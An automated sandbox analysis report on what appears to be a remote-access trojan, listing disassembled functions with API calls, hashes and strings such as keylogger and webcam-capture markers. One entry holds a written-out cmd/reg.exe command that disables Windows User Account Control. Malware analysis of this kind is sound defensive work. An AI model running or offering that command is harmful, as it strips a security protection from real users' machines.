                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1992179935-0
                                                                                                                                                                                    • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                                                                                                                                    • Instruction ID: 3b7d533337b7619b989ec6308daaf08ecf41e56114f2b6f928a248a80599356a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2381A277B00B06ABE7109E6DCC41B5BF7A9EF40324F24492AE615D6680EBF8F94187D0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0323E5E1
                                                                                                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0323E5FD
                                                                                                                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0323E636
                                                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0323E6B3
                                                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0323E6CC
                                                                                                                                                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 0323E701
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 351091851-0
                                                                                                                                                                                    • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                                    • Instruction ID: 2c9d97ee8af89c830433eeaa03820cee77955e13a5efc0c3457e3e4f3621c75b
                                                                                                                                                                                    • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC51C9BA91062D9BCB62DB68CC90AD9B3BCAF4A200F0541D5F509EB211D670AFC58F65
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,15CDF720,15CDA7F5,15CDF720,15D14EF8,?,15CDCE15,FF8BC35D,15D14EF8,15D14EF8), ref: 15CE8219
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE824C
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE8274
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,FF8BC35D,15D14EF8,15D14EF8), ref: 15CE8281
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,FF8BC35D,15D14EF8,15D14EF8), ref: 15CE828D
                                                                                                                                                                                    • _abort.LIBCMT ref: 15CE8293
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                    • Opcode ID: 8f82d87ecd972750da699ad807e7ba068480b3ec40933784c21c3b90242d3138
                                                                                                                                                                                    • Instruction ID: e37f135f27d94da7def827f103fcfa23c96b61076eb1a0d0f167dda38be840a8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f82d87ecd972750da699ad807e7ba068480b3ec40933784c21c3b90242d3138
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9F0CD3B614B512ACA466E796C85F9B3D26DFC1671F240D15F91492280EF25A84182A1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,15D150F0), ref: 15CAB172
                                                                                                                                                                                    • wsprintfW.USER32 ref: 15CAB1F3
                                                                                                                                                                                      • Part of subcall function 15CAA636: SetEvent.KERNEL32(00000000,?,00000000,15CAB20A,00000000), ref: 15CAA662
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EventLocalTimewsprintf
                                                                                                                                                                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                                    • API String ID: 1497725170-248792730
                                                                                                                                                                                    • Opcode ID: 3795c378083c8f60f285d12b331678835a4e4d7d2653bad89e0869f7664f0b50
                                                                                                                                                                                    • Instruction ID: 5e7de0124dee883db6122b81cb52882807dcdbf0eb1742b55a3bb4dfb5bc19a7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3795c378083c8f60f285d12b331678835a4e4d7d2653bad89e0869f7664f0b50
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0111667B604019AACB18DFA4EC948FE7BBDEE48251B10051EF50696190FF78BE45C7E4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0323357E
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 032335B1
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 032335C7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                                                                                                    • Opcode ID: f976f8983e295e53b57d42c4678be1001f34cfdccf554ea393e6de3f59f762c2
                                                                                                                                                                                    • Instruction ID: be8b75a2f0d3d759effcc9d1ea2d6b749f5e3763dcf2eb9717c710f51bcc358b
                                                                                                                                                                                    • Opcode Fuzzy Hash: f976f8983e295e53b57d42c4678be1001f34cfdccf554ea393e6de3f59f762c2
                                                                                                                                                                                    • Instruction Fuzzy Hash: D501B5B9A68318BEDB11EB90DC02BBDB3ECDB09701F104562BB10D6580E6749790C754
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 15CA779B
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 15CA77AA
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 15CA77AF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe, xrefs: 15CA7796
                                                                                                                                                                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 15CA7791
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                    • API String ID: 2922976086-4183131282
                                                                                                                                                                                    • Opcode ID: 2ebff524604e86cece30502982f5ebc8eecf9ac285ab51b9c228d1b940143f13
                                                                                                                                                                                    • Instruction ID: 573565f9fa85b5a64db2b1ebf1aa68c2069257ccfe849332109cdf3ee5c5d014
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ebff524604e86cece30502982f5ebc8eecf9ac285ab51b9c228d1b940143f13
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7F01276D002AC76CB209BD69C4DEDF7F7DEBC5B11F00055AF605A6140DA306444CAF0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,15CE32EB,00000000,?,15CE328B,00000000,15D0E948,0000000C,15CE33E2,00000000,00000002), ref: 15CE335A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,15CE32EB,00000000,?,15CE328B,00000000,15D0E948,0000000C,15CE33E2,00000000,00000002), ref: 15CE336D
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,15CE32EB,00000000,?,15CE328B,00000000,15D0E948,0000000C,15CE33E2,00000000,00000002), ref: 15CE3390
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                    • Opcode ID: b5fc7fadb4b0df6e227f0a66158f1b5960936548bff0e45e4d2b3b932468c26b
                                                                                                                                                                                    • Instruction ID: 5cd7b169f101f74388260b88bdb3e1d059769006248bf3f9c0dbea179ddd6342
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5fc7fadb4b0df6e227f0a66158f1b5960936548bff0e45e4d2b3b932468c26b
                                                                                                                                                                                    • Instruction Fuzzy Hash: F9F0A435914219BBCF019FA4DC88BDDBFB4EF04A51F014599F906A2140CF30AD41CA90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,15D14EF8,15CA4E7A,00000001,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000), ref: 15CA5120
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000), ref: 15CA512C
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000), ref: 15CA5137
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 15CA5140
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                    • String ID: KeepAlive | Disabled
                                                                                                                                                                                    • API String ID: 2993684571-305739064
                                                                                                                                                                                    • Opcode ID: 124af8e31955fc79dcb00a1ab73201a5cbec03eef8be2d968ee9d4b8cf7eb7e0
                                                                                                                                                                                    • Instruction ID: e416cfe2d1cb310eef087ee8b5abf4d45ceed58f50ddbe114078e2a9ecc84ca6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 124af8e31955fc79dcb00a1ab73201a5cbec03eef8be2d968ee9d4b8cf7eb7e0
                                                                                                                                                                                    • Instruction Fuzzy Hash: B6F090B69143226FEF203FB48D499AE7EA9BB12610F00495EF98381651EE616444CBA2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?), ref: 15CA44C4
                                                                                                                                                                                      • Part of subcall function 15CA4607: __EH_prolog.LIBCMT ref: 15CA460C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: H_prologSleep
                                                                                                                                                                                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                                                                                                    • API String ID: 3469354165-3547787478
                                                                                                                                                                                    • Opcode ID: 07923d21a44b8173b1731ec10138cdb00cc0fb19cd0e2e790a16424caeda01b7
                                                                                                                                                                                    • Instruction ID: 5c1ec09d3764b370b80704e9e3ab93c32bf4cb42ec09f2273fca9406267bb23d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 07923d21a44b8173b1731ec10138cdb00cc0fb19cd0e2e790a16424caeda01b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: CD51D57BB082275BCA14EF39C8D4A5E7FA6AFC1690F400D18E80697680FF21B905C792
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,15CFF234), ref: 15CE93CF
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,15D12764,000000FF,00000000,0000003F,00000000,?,?), ref: 15CE9447
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,15D127B8,000000FF,?,0000003F,00000000,?), ref: 15CE9474
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE93BD
                                                                                                                                                                                      • Part of subcall function 15CE6782: HeapFree.KERNEL32(00000000,00000000), ref: 15CE6798
                                                                                                                                                                                      • Part of subcall function 15CE6782: GetLastError.KERNEL32(?,?,15CF0C6F,?,00000000,?,00000000,?,15CF0F13,?,00000007,?,?,15CF145E,?,?), ref: 15CE67AA
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE9589
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1286116820-0
                                                                                                                                                                                    • Opcode ID: 630428eee6c87c64c2e8d2e87122e8677a809637cea34442144a29f283f7182c
                                                                                                                                                                                    • Instruction ID: 122096dd11adbf421249cd4085744d750539918776faef83723664f63785a3f8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 630428eee6c87c64c2e8d2e87122e8677a809637cea34442144a29f283f7182c
                                                                                                                                                                                    • Instruction Fuzzy Hash: C75177B6D04215ABCB10DFA9DCC09DFBBB8FF45650B100A6AE55597290EF34AA42CB50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                    • Opcode ID: 743a926e7286c1f3a5a8bf8fc54880547c608728fdcc0d3d0c855400f6e7f81b
                                                                                                                                                                                    • Instruction ID: 792d982fc9877d3c9ea55ddf034ad23d4915c9c479fc5a28cc76e52635d97fa0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 743a926e7286c1f3a5a8bf8fc54880547c608728fdcc0d3d0c855400f6e7f81b
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2418036E003119FCB14CF78C881A5EBBB6FF89B14F1549A9EA15EB340DA71B901CB80
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 15CBC430
                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,15CBC510,00000000,00000000), ref: 15CBC44D
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CBC459
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,15CA6F85,00000000), ref: 15CBC46A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CBC477
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1852769593-0
                                                                                                                                                                                    • Opcode ID: f5d1a5b407b8ee2708cd15b9a0e361f819a77750cc464d5508b34c451834f807
                                                                                                                                                                                    • Instruction ID: 1fda21c0696ec0a8de385227290a618e41f27342a9fc0a298905d423aea10836
                                                                                                                                                                                    • Opcode Fuzzy Hash: f5d1a5b407b8ee2708cd15b9a0e361f819a77750cc464d5508b34c451834f807
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F112F722141237FE6048E65DCC9EB7779DFB42AF4F004A2AF151C21C0CBA18D048E72
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,15CDBC87,00000000,?,?,15CDBD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 15CE829E
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE82D3
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE82FA
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 15CE8307
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 15CE8310
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                    • Opcode ID: 23ab138de4e0dcef8bb41820877636e4d95fcff65acc6956095d2367c4060c1b
                                                                                                                                                                                    • Instruction ID: 1feebac61c24c6c4f6707be488598fe4d52b9069f6f2e6b87fc6f61c4f2d9bd1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 23ab138de4e0dcef8bb41820877636e4d95fcff65acc6956095d2367c4060c1b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F01A43FA15B516BC7065E755CC4E8B3E6BEBC26717200D29FC15A2290EF75AC4582A0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,0323AAA3,?,?,00000000), ref: 0323AA24
                                                                                                                                                                                      • Part of subcall function 0323A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0323A79E
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0323AAA3,?,?,00000000), ref: 0323AA54
                                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000004), ref: 0323AA5F
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0323AAA3,?,?,00000000), ref: 0323AA7D
                                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A994,00000000,00000000,00000003), ref: 0323AA88
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4102113445-0
                                                                                                                                                                                    • Opcode ID: b27b3ceb23bc006832c6950b86b5b66bdc9f58b7ab37331a52acbec538c5cc31
                                                                                                                                                                                    • Instruction ID: f269a9451c09d8ed094797d1557a6938bad734733e04d76ac91f1ef6f3febd33
                                                                                                                                                                                    • Opcode Fuzzy Hash: b27b3ceb23bc006832c6950b86b5b66bdc9f58b7ab37331a52acbec538c5cc31
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4501F7FA2607887FE701EF78CD12B5E726CDB47620F5101B0E450AA6C0D6A4DE8146A4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 15CBC1F5
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 15CBC208
                                                                                                                                                                                    • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 15CBC228
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CBC233
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CBC23B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2951400881-0
                                                                                                                                                                                    • Opcode ID: 8e4d44e728ba2c68751a07969ff5a4609fa6785dabab8561784e9e7ae3469c72
                                                                                                                                                                                    • Instruction ID: 10170be35f5ecca6b775969b3a611165d507df3c9c9b2b4636c0bdc909f38d39
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e4d44e728ba2c68751a07969ff5a4609fa6785dabab8561784e9e7ae3469c72
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C0126B62802276BDA009ED4CC88FA7B27CEB84AC5F000052FA05C3190EFA09C41CAB2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF09D4
                                                                                                                                                                                      • Part of subcall function 15CE6782: HeapFree.KERNEL32(00000000,00000000), ref: 15CE6798
                                                                                                                                                                                      • Part of subcall function 15CE6782: GetLastError.KERNEL32(?,?,15CF0C6F,?,00000000,?,00000000,?,15CF0F13,?,00000007,?,?,15CF145E,?,?), ref: 15CE67AA
